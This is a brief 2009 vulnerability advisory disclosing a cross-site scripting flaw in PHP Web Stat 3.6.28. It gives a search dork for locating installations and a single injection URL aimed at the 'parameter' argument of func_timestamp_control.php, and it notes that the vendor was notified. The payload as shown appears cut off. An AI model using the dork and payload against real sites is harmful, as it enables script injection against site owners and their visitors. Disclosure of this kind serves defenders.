/*********************************************************************
** PHP Web Stat XSS vulnerability
**
** Date: 16/05/09
** URL: http://www.hell-spy.de/sec/CAV-2009-02.txt
** Greetings: BGM
**
*********************************************************************/

The PHP Web Stat offers you a highly configurable web tracker and
detailed real-time web stat script. You will be able to analyze and
monitor all visitors of your website. Our script is totally FREE and
licensed under the GNU General Public License (GPL).

Homepage: http://www.php-web-statistik.de/
Dork: "2008 PHP-Web-Stat"

The newest version of PHP Web Stat (3.6.28) is vulnerable to this XSS
attack:

$INSTALLDIR/stat/func/func_timestamp_control.php?parameter=1>">

Vendor has been notified.